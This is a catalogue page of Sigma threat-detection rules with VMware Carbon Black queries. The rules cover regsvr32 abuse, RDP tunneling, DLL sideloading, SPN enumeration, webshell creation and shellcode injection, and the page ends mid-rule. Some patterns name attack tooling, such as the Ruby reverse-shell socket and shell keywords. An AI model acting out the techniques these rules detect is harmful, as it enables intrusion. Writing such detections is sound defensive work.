VMware Carbon Black detection rules

medium Strong Medium FP

Potential Regsvr32 Commandline Flag Anomaly

Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.

status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id b236190c-1c61-41e9-84b3-3fe03f6d76b0

carbon_black query

(Image:\\regsvr32.exe (CommandLine:\ \-i\:* OR CommandLine:\ \/i\:* OR CommandLine:\ –i\:* OR CommandLine:\ —i\:* OR CommandLine:\ ―i\:*)) (-CommandLine:\ \-n\ * OR CommandLine:\ \/n\ * OR CommandLine:\ –n\ * OR CommandLine:\ —n\ * OR CommandLine:\ ―n\ *)

view Sigma YAML

title: Potential Regsvr32 Commandline Flag Anomaly
id: b236190c-1c61-41e9-84b3-3fe03f6d76b0
status: test
description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
references:
    - https://twitter.com/sbousseaden/status/1282441816986484737?s=12
author: Florian Roth (Nextron Systems)
date: 2019-07-13
modified: 2024-03-13
tags:
    - attack.stealth
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains|windash: ' -i:'
    filter_main_flag:
        CommandLine|contains|windash: ' -n '
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Administrator typo might cause some false positives
level: medium

Convert to SIEM query

medium Moderate Low FP

Potential Remote Command Execution In Pod Container

Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command.

status test author Leo Tsaousis (@laripping) ATT&CK technique id a1b0ca4e-7835-413e-8471-3ff2b8a66be6

carbon_black query

verb:create "objectRef.resource":pods "objectRef.subresource":exec

view Sigma YAML

title: Potential Remote Command Execution In Pod Container
id: a1b0ca4e-7835-413e-8471-3ff2b8a66be6
status: test
description: |
    Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command.
references:
    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
    - attack.t1609
    - attack.execution
logsource:
    category: application
    product: kubernetes
    service: audit
detection:
    selection:
        verb: 'create'
        objectRef.resource: 'pods'
        objectRef.subresource: 'exec'
    condition: selection
falsepositives:
    - Legitimate debugging activity. Investigate the identity performing the requests and their authorization.
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential Remote Desktop Connection to Non-Domain Host

Detects logons using NTLM to hosts that are potentially not part of the domain.

status test author James Pemberton ATT&CK sub-technique id ce5678bb-b9aa-4fb5-be4b-e57f686256ad

carbon_black query

EventID:8001 TargetName:TERMSRV*

view Sigma YAML

title: Potential Remote Desktop Connection to Non-Domain Host
id: ce5678bb-b9aa-4fb5-be4b-e57f686256ad
status: test
description: Detects logons using NTLM to hosts that are potentially not part of the domain.
references:
    - n/a
author: James Pemberton
date: 2020-05-22
modified: 2021-11-27
tags:
    - attack.command-and-control
    - attack.t1219.002
logsource:
    product: windows
    service: ntlm
    definition: Requires events from Microsoft-Windows-NTLM/Operational
detection:
    selection:
        EventID: 8001
        TargetName|startswith: 'TERMSRV'
    condition: selection
falsepositives:
    - Host connections to valid domains, exclude these.
    - Host connections not using host FQDN.
    - Host connections to external legitimate domains.
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Remote Desktop Tunneling

Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.

status test author Tim Rauch, Elastic (idea) ATT&CK technique id 8a3038e8-9c9d-46f8-b184-66234a160f6f

carbon_black query

CommandLine:\:3389* (CommandLine:\ \-L\ * OR CommandLine:\ \-P\ * OR CommandLine:\ \-R\ * OR CommandLine:\ \-pw\ * OR CommandLine:\ \-ssh\ *)

view Sigma YAML

title: Potential Remote Desktop Tunneling
id: 8a3038e8-9c9d-46f8-b184-66234a160f6f
status: test
description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
references:
    - https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-27
tags:
    - attack.lateral-movement
    - attack.t1021
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: ':3389' # RDP port and usual SSH tunneling related switches in command line
    selection_opt:
        CommandLine|contains:
            - ' -L '
            - ' -P '
            - ' -R '
            - ' -pw '
            - ' -ssh '
    condition: all of selection*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Low FP

Potential Remote WMI ActiveScriptEventConsumers Activity

Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity.

status test author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) ATT&CK sub-technique id 9599c180-e3a8-4743-8f92-7fb96d3be648

carbon_black query

(EventID:4624 LogonType:3 ProcessName:scrcons.exe) (-TargetLogonId:0x3e7)

view Sigma YAML

title: Potential Remote WMI ActiveScriptEventConsumers Activity
id: 9599c180-e3a8-4743-8f92-7fb96d3be648
status: test
description: |
    Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network.
    This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
references:
    - https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-09-02
modified: 2024-09-02
tags:
    - attack.lateral-movement
    - attack.privilege-escalation
    - detection.threat-hunting
    - attack.persistence
    - attack.t1546.003
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4624
        LogonType: 3
        ProcessName|endswith: 'scrcons.exe'
    filter_main_local_system:
        TargetLogonId: '0x3e7' # Local System
    condition: selection and not 1 of filter_main_*
falsepositives:
    - SCCM
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential RjvPlatform.DLL Sideloading From Default Location

Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.

status test author X__Junior (Nextron Systems) ATT&CK sub-technique id 259dda31-b7a3-444f-b7d8-17f96e8a7d0d

carbon_black query

Image:C\:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe ImageLoaded:C\:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll

view Sigma YAML

title: Potential RjvPlatform.DLL Sideloading From Default Location
id: 259dda31-b7a3-444f-b7d8-17f96e8a7d0d
status: test
description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
references:
    - https://twitter.com/0gtweet/status/1666716511988330499
author: X__Junior (Nextron Systems)
date: 2023-06-09
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image: 'C:\Windows\System32\SystemResetPlatform\SystemResetPlatform.exe'
        ImageLoaded: 'C:\$SysReset\Framework\Stack\RjvPlatform.dll'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential RoboForm.DLL Sideloading

Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager

status test author X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id f64c9b2d-b0ad-481d-9d03-7fc75020892a

carbon_black query

(ImageLoaded:\\roboform.dll OR ImageLoaded:\\roboform\-x64.dll) (-((Image:\ C\:\\Program\ Files\ \(x86\)\\Siber\ Systems\\AI\ RoboForm\\* OR Image:\ C\:\\Program\ Files\\Siber\ Systems\\AI\ RoboForm\\*) (Image:\\robotaskbaricon.exe OR Image:\\robotaskbaricon\-x64.exe)))

view Sigma YAML

title: Potential RoboForm.DLL Sideloading
id: f64c9b2d-b0ad-481d-9d03-7fc75020892a
status: test
description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
references:
    - https://twitter.com/StopMalvertisin/status/1648604148848549888
    - https://twitter.com/t3ft3lb/status/1656194831830401024
    - https://www.roboform.com/
author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-14
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith:
            - '\roboform.dll'
            - '\roboform-x64.dll'
    filter_main_path:
        Image|startswith:
            - ' C:\Program Files (x86)\Siber Systems\AI RoboForm\'
            - ' C:\Program Files\Siber Systems\AI RoboForm\'
        Image|endswith:
            - '\robotaskbaricon.exe'
            - '\robotaskbaricon-x64.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Ruby Reverse Shell

Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell

status test author @d4ns4n_ ATT&CK tactic-only id b8bdac18-c06e-4016-ac30-221553e74f59

carbon_black query

Image:ruby* (CommandLine:\ \-e* CommandLine:rsocket* CommandLine:TCPSocket*) (CommandLine:\ ash* OR CommandLine:\ bash* OR CommandLine:\ bsh* OR CommandLine:\ csh* OR CommandLine:\ ksh* OR CommandLine:\ pdksh* OR CommandLine:\ sh* OR CommandLine:\ tcsh*)

view Sigma YAML

title: Potential Ruby Reverse Shell
id: b8bdac18-c06e-4016-ac30-221553e74f59
status: test
description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
references:
    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://www.revshells.com/
author: '@d4ns4n_'
date: 2023-04-07
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|contains: 'ruby'
        CommandLine|contains|all:
            - ' -e'
            - 'rsocket'
            - 'TCPSocket'
        CommandLine|contains:
            - ' ash'
            - ' bash'
            - ' bsh'
            - ' csh'
            - ' ksh'
            - ' pdksh'
            - ' sh'
            - ' tcsh'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential SAP NetWeaver Webshell Creation

Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.

status experimental author Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id 86a7c91f-98c3-4f14-a58d-d989421e1234

carbon_black query

(TargetFilename:\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work* OR TargetFilename:\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root*) (TargetFilename:.jsp OR TargetFilename:.java OR TargetFilename:.class)

view Sigma YAML

title: Potential SAP NetWeaver Webshell Creation
id: 86a7c91f-98c3-4f14-a58d-d989421e1234
status: experimental
description: |
    Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
    which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
references:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324
    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/
author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-04-28
tags:
    - attack.execution
    - attack.initial-access
    - attack.t1190
    - attack.persistence
    - attack.t1059.003
    - cve.2025-31324
    - detection.emerging-threats
logsource:
    product: windows
    category: file_event
detection:
    selection_path:
        TargetFilename|contains:
            - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work'
            - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root'
    selection_ext:
        TargetFilename|endswith:
            - '.jsp'
            - '.java'
            - '.class'
    condition: all of selection_*
falsepositives:
    - Legitimate creation of jsc or java files in these locations
level: medium

Convert to SIEM query

medium Moderate High FP

Potential SAP NetWeaver Webshell Creation - Linux

Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.

status experimental author Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id 5b91409c-cb18-4ab6-ac75-c5759f998409

carbon_black query

(TargetFilename:\/j2ee\/cluster\/apps\/sap.com\/irj\/servlet_jsp\/irj\/work\/* OR TargetFilename:\/j2ee\/cluster\/apps\/sap.com\/irj\/servlet_jsp\/irj\/root\/*) (TargetFilename:.jsp OR TargetFilename:.java OR TargetFilename:.class)

view Sigma YAML

title: Potential SAP NetWeaver Webshell Creation - Linux
id: 5b91409c-cb18-4ab6-ac75-c5759f998409
status: experimental
description: |
    Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
    which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
references:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324
    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/
author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-04-28
tags:
    - attack.execution
    - attack.initial-access
    - attack.t1190
    - attack.persistence
    - attack.t1059.003
    - cve.2025-31324
    - detection.emerging-threats
logsource:
    product: linux
    category: file_event
detection:
    selection_path:
        TargetFilename|contains:
            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/'
            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/'
    selection_ext:
        TargetFilename|endswith:
            - '.jsp'
            - '.java'
            - '.class'
    condition: all of selection_*
falsepositives:
    - Legitimate creation of jsc or java files in these locations
level: medium

Convert to SIEM query

medium Strong High FP

Potential SPN Enumeration Via Setspn.EXE

Detects service principal name (SPN) enumeration used for Kerberoasting

status test author Markus Neis, keepwatch ATT&CK sub-technique id 1eeed653-dbc8-4187-ad0c-eeebb20e6599

carbon_black query

(Image:\\setspn.exe OR OriginalFileName:setspn.exe OR (Description:Query\ or\ reset\ the\ computer* Description:SPN\ attribute*)) (CommandLine:\ \-q\ * OR CommandLine:\ \/q\ *)

view Sigma YAML

title: Potential SPN Enumeration Via Setspn.EXE
id: 1eeed653-dbc8-4187-ad0c-eeebb20e6599
status: test
description: Detects service principal name (SPN) enumeration used for Kerberoasting
references:
    - https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation
    - https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019
author: Markus Neis, keepwatch
date: 2018-11-14
modified: 2023-10-23
tags:
    - attack.credential-access
    - attack.t1558.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_pe:
        - Image|endswith: '\setspn.exe'
        - OriginalFileName: 'setspn.exe'
        - Description|contains|all:
              - 'Query or reset the computer'
              - 'SPN attribute'
    selection_cli:
        CommandLine|contains:
            - ' -q '
            - ' /q '
    condition: all of selection_*
falsepositives:
    - Administration activity
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential Script Proxy Execution Via CL_Mutexverifiers.ps1

Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands

status test author Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113 ATT&CK technique id 1e0e1a81-e79b-44bc-935b-ddb9c8006b3d

carbon_black query

((ParentImage:\\powershell.exe OR ParentImage:\\pwsh.exe) Image:\\powershell.exe CommandLine:\ \-nologo\ \-windowstyle\ minimized\ \-file\ *) (CommandLine:\\AppData\\Local\\Temp\\* OR CommandLine:\\Windows\\Temp\\*)

view Sigma YAML

title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
id: 1e0e1a81-e79b-44bc-935b-ddb9c8006b3d
status: test
description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
references:
    - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/
author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113
date: 2022-05-21
modified: 2023-08-17
tags:
    - attack.stealth
    - attack.t1216
logsource:
    category: process_creation
    product: windows
detection:
    selection_pwsh:
        ParentImage|endswith:
            # Note: to avoid potential FPs we assume the script was launched from powershell. But in theory it can be launched by any Powershell like process
            - '\powershell.exe'
            - '\pwsh.exe'
        Image|endswith: '\powershell.exe'
        CommandLine|contains: ' -nologo -windowstyle minimized -file '
    selection_temp:
        # Note: Since the function uses "env:temp" the value will change depending on the context of exec
        CommandLine|contains:
            - '\AppData\Local\Temp\'
            - '\Windows\Temp\'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Secure Deletion with SDelete

Detects files that have extensions commonly seen while SDelete is used to wipe files.

status test author Thomas Patzke ATT&CK sub-technique id 39a80702-d7ca-4a83-b776-525b1f86a36d

carbon_black query

(EventID:4656 OR EventID:4663 OR EventID:4658) (ObjectName:.AAA OR ObjectName:.ZZZ)

view Sigma YAML

title: Potential Secure Deletion with SDelete
id: 39a80702-d7ca-4a83-b776-525b1f86a36d
status: test
description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
references:
    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm
    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
    - https://learn.microsoft.com/en-gb/sysinternals/downloads/sdelete
author: Thomas Patzke
date: 2017-06-14
modified: 2024-12-13
tags:
    - attack.impact
    - attack.stealth
    - attack.defense-impairment
    - attack.t1070.004
    - attack.t1027.005
    - attack.t1485
    - attack.t1553.002
    - attack.s0195
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID:
            - 4656
            - 4663
            - 4658
        ObjectName|endswith:
            - '.AAA'
            - '.ZZZ'
    condition: selection
falsepositives:
    - Legitimate usage of SDelete
    - Files that are interacted with that have these extensions legitimately
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential SentinelOne Shell Context Menu Scan Command Tampering

Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 6c304b02-06e6-402d-8be4-d5833cdf8198

carbon_black query

TargetObject:\\shell\\SentinelOneScan\\command\\* (-(((Details:C\:\\Program\ Files\\SentinelOne\\Sentinel\ Agent* OR Details:C\:\\Program\ Files\ \(x86\)\\SentinelOne\\Sentinel\ Agent*) Details:\\SentinelScanFromContextMenu.exe*) OR (Image:C\:\\Program\ Files\\SentinelOne\\ OR Image:C\:\\Program\ Files\ \(x86\)\\SentinelOne\\)))

view Sigma YAML

title: Potential SentinelOne Shell Context Menu Scan Command Tampering
id: 6c304b02-06e6-402d-8be4-d5833cdf8198
status: test
description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
references:
    - https://mrd0x.com/sentinelone-persistence-via-menu-context/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-03-06
tags:
    - attack.persistence
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\shell\SentinelOneScan\command\'
    filter_main_sentinelone_default_scan_binary:
        Details|startswith:
            - 'C:\Program Files\SentinelOne\Sentinel Agent'
            - 'C:\Program Files (x86)\SentinelOne\Sentinel Agent'
        Details|contains: '\SentinelScanFromContextMenu.exe'
    filter_main_sentinelone_binary:
        Image|endswith:
            - 'C:\Program Files\SentinelOne\'
            - 'C:\Program Files (x86)\SentinelOne\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential ShellDispatch.DLL Functionality Abuse

Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"

status test author X__Junior (Nextron Systems) ATT&CK tactic-only id 82343930-652f-43f5-ab70-2ee9fdd6d5e9

carbon_black query

(Image:\\rundll32.exe OR OriginalFileName:RUNDLL32.EXE) CommandLine:RunDll_ShellExecuteW*

view Sigma YAML

title: Potential ShellDispatch.DLL Functionality Abuse
id: 82343930-652f-43f5-ab70-2ee9fdd6d5e9
status: test
description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
references:
    - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/
author: X__Junior (Nextron Systems)
date: 2023-06-20
tags:
    - attack.execution
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\rundll32.exe'
        - OriginalFileName: 'RUNDLL32.EXE'
    selection_cli:
        CommandLine|contains: 'RunDll_ShellExecuteW'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: medium

Convert to SIEM query

medium Moderate High FP

Potential ShellDispatch.DLL Sideloading

Detects potential DLL sideloading of "ShellDispatch.dll"

status test author X__Junior (Nextron Systems) ATT&CK sub-technique id 844f8eb2-610b-42c8-89a4-47596e089663

carbon_black query

ImageLoaded:\\ShellDispatch.dll (-((ImageLoaded:\:\\Users\\* ImageLoaded:\\AppData\\Local\\Temp\\*) OR ImageLoaded:\:\\Windows\\Temp\\*))

view Sigma YAML

title: Potential ShellDispatch.DLL Sideloading
id: 844f8eb2-610b-42c8-89a4-47596e089663
status: test
description: Detects potential DLL sideloading of "ShellDispatch.dll"
references:
    - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/
author: X__Junior (Nextron Systems)
date: 2023-06-20
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\ShellDispatch.dll'
    filter_main_legit_path:
        - ImageLoaded|contains|all:
              - ':\Users\'
              - '\AppData\Local\Temp\'
        - ImageLoaded|contains: ':\Windows\Temp\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Some installers may trigger some false positives
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Shellcode Injection

Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.

status test author Bhabesh Raj ATT&CK technique id 250ae82f-736e-4844-a68b-0b5e8cc887da

carbon_black query

((GrantedAccess:0x147a OR GrantedAccess:0x1f3fff) CallTrace:UNKNOWN*) (-(SourceImage:C\:\\Windows\\System32\\Wbem\\Wmiprvse.exe TargetImage:C\:\\Windows\\system32\\lsass.exe)) (-(((SourceImage:C\:\\Program\ Files\\Dell\\* OR SourceImage:C\:\\Program\ Files\ \(x86\)\\Dell\\*) (TargetImage:C\:\\Program\ Files\\Dell\\* OR TargetImage:C\:\\Program\ Files\ \(x86\)\\Dell\\*)) OR (SourceImage:C\:\\Program\ Files\ \(x86\)\\Dell\\UpdateService\\ServiceShell.exe TargetImage:C\:\\Windows\\Explorer.EXE) OR (SourceImage:C\:\\Program\ Files\\Microsoft\ Visual\ Studio\\* TargetImage:C\:\\Program\ Files\\Microsoft\ Visual\ Studio\\*)))

view Sigma YAML

title: Potential Shellcode Injection
id: 250ae82f-736e-4844-a68b-0b5e8cc887da
status: test
description: Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.
references:
    - https://github.com/EmpireProject/PSInject
author: Bhabesh Raj
date: 2022-03-11
modified: 2024-07-02
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
    - detection.threat-hunting
logsource:
    category: process_access
    product: windows
detection:
    selection:
        GrantedAccess:
            - '0x147a'
            - '0x1f3fff'
        CallTrace|contains: 'UNKNOWN'
    filter_main_wmiprvse:
        SourceImage: 'C:\Windows\System32\Wbem\Wmiprvse.exe'
        TargetImage: 'C:\Windows\system32\lsass.exe'
    filter_optional_dell_folders:
        # If dell software is installed we get matches like these
        # Example 1:
        #   SourceImage: C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe
        #   TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe
        #   GrantedAccess: 0x1F3FFF
        # Example 2:
        #   SourceImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe
        #   TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe
        #   GrantedAccess: 0x1F3FFF
        # Example 3:
        #   SourceImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe
        #   TargetImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe
        #   GrantedAccess: 0x1F3FFF
        SourceImage|startswith:
            - 'C:\Program Files\Dell\'
            - 'C:\Program Files (x86)\Dell\'
        TargetImage|startswith:
            - 'C:\Program Files\Dell\'
            - 'C:\Program Files (x86)\Dell\'
    filter_optional_dell_specifc:
        SourceImage: 'C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe'
        TargetImage: 'C:\Windows\Explorer.EXE'
    filter_optional_visual_studio:
        SourceImage|startswith: 'C:\Program Files\Microsoft Visual Studio\'
        TargetImage|startswith: 'C:\Program Files\Microsoft Visual Studio\'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential Shim Database Persistence via Sdbinst.EXE

Detects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims

status test author Markus Neis ATT&CK sub-technique id 517490a7-115a-48c6-8862-1a481504d5a8

carbon_black query

((Image:\\sdbinst.exe OR OriginalFileName:sdbinst.exe) CommandLine:.sdb*) (-(ParentImage:\\msiexec.exe (CommandLine:\:\\Program\ Files\ \(x86\)\\IIS\ Express\\iisexpressshim.sdb* OR CommandLine:\:\\Program\ Files\\IIS\ Express\\iisexpressshim.sdb*)))

view Sigma YAML

title: Potential Shim Database Persistence via Sdbinst.EXE
id: 517490a7-115a-48c6-8862-1a481504d5a8
related:
    - id: 18ee686c-38a3-4f65-9f44-48a077141f42
      type: similar
status: test
description: |
    Detects installation of a new shim using sdbinst.exe.
    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
references:
    - https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence
author: Markus Neis
date: 2019-01-16
modified: 2023-12-06
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1546.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\sdbinst.exe'
        - OriginalFileName: 'sdbinst.exe'
    selection_cli:
        CommandLine|contains: '.sdb'
    filter_optional_iis:
        ParentImage|endswith: '\msiexec.exe'
        CommandLine|contains:
            # Expected behavior for IIS Express (e.g. https://www.hybrid-analysis.com/sample/15d4ff941f77f7bdfc9dfb2399b7b952a0a2c860976ef3e835998ff4796e5e91?environmentId=120)
            - ':\Program Files (x86)\IIS Express\iisexpressshim.sdb'
            - ':\Program Files\IIS Express\iisexpressshim.sdb'
    condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Low FP

Potential Sidecar Injection Into Running Deployment

Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod, that resides alongside the main container. One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a "kubectl patch" operation. By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.

status test author Leo Tsaousis (@laripping) ATT&CK technique id ad9012a6-e518-4432-9890-f3b82b8fc71f

carbon_black query

verb:patch apiGroup:apps "objectRef.resource":deployments

view Sigma YAML

title: Potential Sidecar Injection Into Running Deployment
id: ad9012a6-e518-4432-9890-f3b82b8fc71f
status: test
description: |
    Detects attempts to inject a sidecar container into a running deployment.
    A sidecar container is an additional container within a pod, that resides alongside the main container.
    One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a "kubectl patch" operation.
    By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.
references:
    - https://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch
    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
    - attack.t1609
    - attack.execution
logsource:
    category: application
    product: kubernetes
    service: audit
detection:
    selection:
        verb: 'patch'
        apiGroup: 'apps'
        objectRef.resource: 'deployments'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential SolidPDFCreator.DLL Sideloading

Detects potential DLL sideloading of "SolidPDFCreator.dll"

status test author X__Junior (Nextron Systems) ATT&CK sub-technique id a2edbce1-95c8-4291-8676-0d45146862b3

carbon_black query

ImageLoaded:\\SolidPDFCreator.dll (-(Image:\\SolidPDFCreator.exe (ImageLoaded:C\:\\Program\ Files\ \(x86\)\\SolidDocuments\\SolidPDFCreator\\* OR ImageLoaded:C\:\\Program\ Files\\SolidDocuments\\SolidPDFCreator\\*)))

view Sigma YAML

title: Potential SolidPDFCreator.DLL Sideloading
id: a2edbce1-95c8-4291-8676-0d45146862b3
status: test
description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
references:
    - https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/
author: X__Junior (Nextron Systems)
date: 2023-05-07
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
